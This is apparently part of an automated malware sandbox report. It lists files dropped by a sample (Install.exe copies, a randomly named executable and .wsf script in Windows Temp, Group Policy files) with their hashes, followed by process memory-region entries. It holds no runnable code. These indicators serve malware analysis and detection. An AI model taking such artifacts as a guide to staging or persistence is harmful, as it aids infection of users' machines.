SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD562ca0d07fc4640d5c0540581fd260283
SHA1911d276c8167a2f5dfc0d8f746d6f9925615d402
SHA256981009169bc405e6ffec5bf07bacb0ea8ed65f68adbfb97bf6370b77afeb0bd3
SHA512e238faea8bb903ecb35a03a9e6f4f31add345d2daa59824039bd5200b2e12b2f042baeb8e1a1e7d129f151c65bdbe1122b7fb21bfc6faad7b7a6bd9e4517f628
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD562ca0d07fc4640d5c0540581fd260283
SHA1911d276c8167a2f5dfc0d8f746d6f9925615d402
SHA256981009169bc405e6ffec5bf07bacb0ea8ed65f68adbfb97bf6370b77afeb0bd3
SHA512e238faea8bb903ecb35a03a9e6f4f31add345d2daa59824039bd5200b2e12b2f042baeb8e1a1e7d129f151c65bdbe1122b7fb21bfc6faad7b7a6bd9e4517f628
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5eb8044e4d79af7269ca987842ac4d7c9
SHA10f8b1e26822870856aeadd5dad8a24c2ab22cbd8
SHA256604cb98519dfd5a9d656d46a65fd4f0fb0c1e2e674472e80d55225b628d8b302
SHA5123aef5c6e1786bc36bf1f06ca4fb386d4f6301567642bb20961622a35687478d61f34986450e51ef5fff89fd42e8e8a4ae4f7482879a3b0f06208575510fcd17e
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\rXdRXZw.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\rXdRXZw.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\jjHjxerq\nixwhbMlwWstWgGw.wsfFilesize
8KB
MD5e232fc6bda6f667e3a27f2d04b4ace08
SHA13a83117b185559fa0fb1b6e146d47536d2c26ce8
SHA2567c2b51896073be3727c296e61d54886f085760e711f968ea1d492491fe9fcb86
SHA512bf61d6b0fcc5731b66b1ac7398c549919222873e839acf91b15a0b3b26ca685a96e54fb85d3685f4e38727394201cbbfa466f4ebc52ce27ae003b538fa8bd379
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
5KB
MD5af5a9b0cf67552db9b66a82d6d3fd4af
SHA1dd4720be6c9cdad2c1f6b4e30e71d9b0acae67e5
SHA2563645932a2885c6129467b5760fd211e021fbe3f4a9e34c620533ed54676e03ed
SHA512c9284f6cbeecd01bd53dbf75e7ebdf16b6f124e000ca6b711996c1c887c2a33596b9084e81069c4da0c0bd14ac8907024ce2c400dd973af5c9c0e95c520213bb
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
\Users\Admin\AppData\Local\Temp\7zSADA.tmp\Install.exeFilesize
6.3MB
MD5e60c51107adfeca90bde43deb57f4688
SHA1f222c460fa96184bc2fe82e8e041eb6b12f8f5aa
SHA256a17b2c41dd6b592f61f9e1d407854dfb1465c569cc44335b36c2cb2b84f17690
SHA5122b2c4d493b11bbb654a706536a59e16a34e4ffc88458880b9b334d4a5782c5d2661b6c421e5d46bffc7938fe0dbb8450842d2182f5ccc6da471a3d2a48f80884
-
\Users\Admin\AppData\Local\Temp\7zSADA.tmp\Install.exeFilesize
6.3MB
MD5e60c51107adfeca90bde43deb57f4688
SHA1f222c460fa96184bc2fe82e8e041eb6b12f8f5aa
SHA256a17b2c41dd6b592f61f9e1d407854dfb1465c569cc44335b36c2cb2b84f17690
SHA5122b2c4d493b11bbb654a706536a59e16a34e4ffc88458880b9b334d4a5782c5d2661b6c421e5d46bffc7938fe0dbb8450842d2182f5ccc6da471a3d2a48f80884
-
\Users\Admin\AppData\Local\Temp\7zSADA.tmp\Install.exeFilesize
6.3MB
MD5e60c51107adfeca90bde43deb57f4688
SHA1f222c460fa96184bc2fe82e8e041eb6b12f8f5aa
SHA256a17b2c41dd6b592f61f9e1d407854dfb1465c569cc44335b36c2cb2b84f17690
SHA5122b2c4d493b11bbb654a706536a59e16a34e4ffc88458880b9b334d4a5782c5d2661b6c421e5d46bffc7938fe0dbb8450842d2182f5ccc6da471a3d2a48f80884
-
\Users\Admin\AppData\Local\Temp\7zSADA.tmp\Install.exeFilesize
6.3MB
MD5e60c51107adfeca90bde43deb57f4688
SHA1f222c460fa96184bc2fe82e8e041eb6b12f8f5aa
SHA256a17b2c41dd6b592f61f9e1d407854dfb1465c569cc44335b36c2cb2b84f17690
SHA5122b2c4d493b11bbb654a706536a59e16a34e4ffc88458880b9b334d4a5782c5d2661b6c421e5d46bffc7938fe0dbb8450842d2182f5ccc6da471a3d2a48f80884
-
\Users\Admin\AppData\Local\Temp\7zSDE6.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
\Users\Admin\AppData\Local\Temp\7zSDE6.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
\Users\Admin\AppData\Local\Temp\7zSDE6.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
\Users\Admin\AppData\Local\Temp\7zSDE6.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
memory/268-93-0x0000000000000000-mapping.dmp
-
memory/292-150-0x0000000000000000-mapping.dmp
-
memory/428-153-0x0000000000000000-mapping.dmp
-
memory/432-99-0x00000000028CB000-0x00000000028EA000-memory.dmpFilesize
124KB
-
memory/432-88-0x0000000000000000-mapping.dmp
-
memory/432-96-0x00000000028C4000-0x00000000028C7000-memory.dmpFilesize
12KB
-
memory/432-95-0x000007FEF3C40000-0x000007FEF479D000-memory.dmpFilesize
11.4MB
-
memory/432-98-0x00000000028C4000-0x00000000028C7000-memory.dmpFilesize
12KB
-
memory/432-97-0x000000001B8B0000-0x000000001BBAF000-memory.dmpFilesize
3.0MB
-
memory/432-119-0x00000000028CB000-0x00000000028EA000-memory.dmpFilesize
124KB
-
memory/432-118-0x00000000028C4000-0x00000000028C7000-memory.dmpFilesize
12KB
-
memory/432-120-0x00000000028CB000-0x00000000028EA000-memory.dmpFilesize
124KB
-
memory/432-90-0x000007FEF47A0000-0x000007FEF51C3000-memory.dmpFilesize
10.1MB
-
memory/432-89-0x000007FEFC291000-0x000007FEFC293000-memory.dmpFilesize
8KB
-
memory/476-167-0x0000000000000000-mapping.dmp
-
memory/476-149-0x0000000000000000-mapping.dmp
-
memory/524-91-0x0000000000000000-mapping.dmp
-
memory/572-161-0x0000000000000000-mapping.dmp
-
memory/580-138-0x0000000000000000-mapping.dmp
-
memory/584-168-0x0000000000000000-mapping.dmp
-
memory/628-156-0x0000000000000000-mapping.dmp
-
memory/676-160-0x0000000000000000-mapping.dmp
-
memory/756-54-0x0000000075ED1000-0x0000000075ED3000-memory.dmpFilesize
8KB
-
memory/816-78-0x0000000000000000-mapping.dmp
-
memory/848-56-0x0000000000000000-mapping.dmp
-
memory/880-144-0x0000000000000000-mapping.dmp
-
memory/896-129-0x0000000000000000-mapping.dmp
-
memory/924-141-0x0000000000000000-mapping.dmp
-
memory/924-176-0x0000000000000000-mapping.dmp
-
memory/944-64-0x0000000000000000-mapping.dmp
-
memory/944-73-0x0000000017580000-0x0000000018870000-memory.dmpFilesize
18.9MB
-
memory/948-186-0x000000000286B000-0x000000000288A000-memory.dmpFilesize
124KB
-
memory/948-181-0x000007FEF47A0000-0x000007FEF51C3000-memory.dmpFilesize
10.1MB
-
memory/948-182-0x000007FEF3C40000-0x000007FEF479D000-memory.dmpFilesize
11.4MB
-
memory/948-183-0x0000000002864000-0x0000000002867000-memory.dmpFilesize
12KB
-
memory/948-184-0x000000000286B000-0x000000000288A000-memory.dmpFilesize
124KB
-
memory/948-185-0x0000000002864000-0x0000000002867000-memory.dmpFilesize
12KB
-
memory/976-121-0x0000000000000000-mapping.dmp
-
memory/980-175-0x0000000000000000-mapping.dmp
-
memory/1008-173-0x0000000000000000-mapping.dmp
-
memory/1008-82-0x0000000000000000-mapping.dmp
-
memory/1056-140-0x0000000000000000-mapping.dmp
-
memory/1064-165-0x0000000000000000-mapping.dmp
-
memory/1084-80-0x0000000000000000-mapping.dmp
-
memory/1116-127-0x0000000000000000-mapping.dmp
-
memory/1148-75-0x0000000000000000-mapping.dmp
-
memory/1152-155-0x0000000000000000-mapping.dmp
-
memory/1168-169-0x0000000000000000-mapping.dmp
-
memory/1180-162-0x0000000000000000-mapping.dmp
-
memory/1196-130-0x0000000000000000-mapping.dmp
-
memory/1196-139-0x000000000283B000-0x000000000285A000-memory.dmpFilesize
124KB
-
memory/1196-134-0x000007FEF3CD0000-0x000007FEF482D000-memory.dmpFilesize
11.4MB
-
memory/1196-136-0x0000000002834000-0x0000000002837000-memory.dmpFilesize
12KB
-
memory/1196-137-0x000000000283B000-0x000000000285A000-memory.dmpFilesize
124KB
-
memory/1196-135-0x000000001B700000-0x000000001B9FF000-memory.dmpFilesize
3.0MB
-
memory/1200-143-0x0000000000000000-mapping.dmp
-
memory/1216-154-0x0000000000000000-mapping.dmp
-
memory/1272-114-0x000007FEF47A0000-0x000007FEF51C3000-memory.dmpFilesize
10.1MB
-
memory/1272-116-0x00000000027C4000-0x00000000027C7000-memory.dmpFilesize
12KB
-
memory/1272-117-0x00000000027CB000-0x00000000027EA000-memory.dmpFilesize
124KB
-
memory/1272-115-0x000007FEF3C40000-0x000007FEF479D000-memory.dmpFilesize
11.4MB
-
memory/1272-122-0x00000000027CB000-0x00000000027EA000-memory.dmpFilesize
124KB
-
memory/1272-163-0x0000000000000000-mapping.dmp
-
memory/1272-111-0x0000000000000000-mapping.dmp
-
memory/1288-178-0x0000000000000000-mapping.dmp
-
memory/1348-142-0x0000000000000000-mapping.dmp
-
memory/1376-84-0x0000000000000000-mapping.dmp
-
memory/1488-201-0x0000000017AD0000-0x0000000017B3C000-memory.dmpFilesize
432KB
-
memory/1488-197-0x00000000176B0000-0x0000000017735000-memory.dmpFilesize
532KB
-
memory/1488-191-0x0000000015CA0000-0x0000000016F90000-memory.dmpFilesize
18.9MB
-
memory/1488-147-0x0000000000000000-mapping.dmp
-
memory/1488-125-0x0000000000000000-mapping.dmp
-
memory/1492-105-0x0000000015E40000-0x0000000017130000-memory.dmpFilesize
18.9MB
-
memory/1492-102-0x0000000000000000-mapping.dmp
-
memory/1496-86-0x0000000000000000-mapping.dmp
-
memory/1520-164-0x0000000000000000-mapping.dmp
-
memory/1616-100-0x0000000000000000-mapping.dmp
-
memory/1624-170-0x0000000000000000-mapping.dmp
-
memory/1660-171-0x0000000000000000-mapping.dmp
-
memory/1692-126-0x0000000000000000-mapping.dmp
-
memory/1700-124-0x0000000000000000-mapping.dmp
-
memory/1712-145-0x0000000000000000-mapping.dmp
-
memory/1716-110-0x0000000000000000-mapping.dmp
-
memory/1788-146-0x0000000000000000-mapping.dmp
-
memory/1808-174-0x0000000000000000-mapping.dmp
-
memory/1832-158-0x0000000000000000-mapping.dmp
-
memory/1884-74-0x0000000000000000-mapping.dmp
-
memory/1916-166-0x0000000000000000-mapping.dmp
-
memory/1936-109-0x0000000000000000-mapping.dmp
-
memory/1940-172-0x0000000000000000-mapping.dmp
-
memory/1944-177-0x0000000000000000-mapping.dmp
-
memory/1952-123-0x0000000000000000-mapping.dmp
-
memory/1972-159-0x0000000000000000-mapping.dmp
-
memory/1992-148-0x0000000000000000-mapping.dmp
-
memory/1996-157-0x0000000000000000-mapping.dmp
-
memory/2024-128-0x0000000000000000-mapping.dmp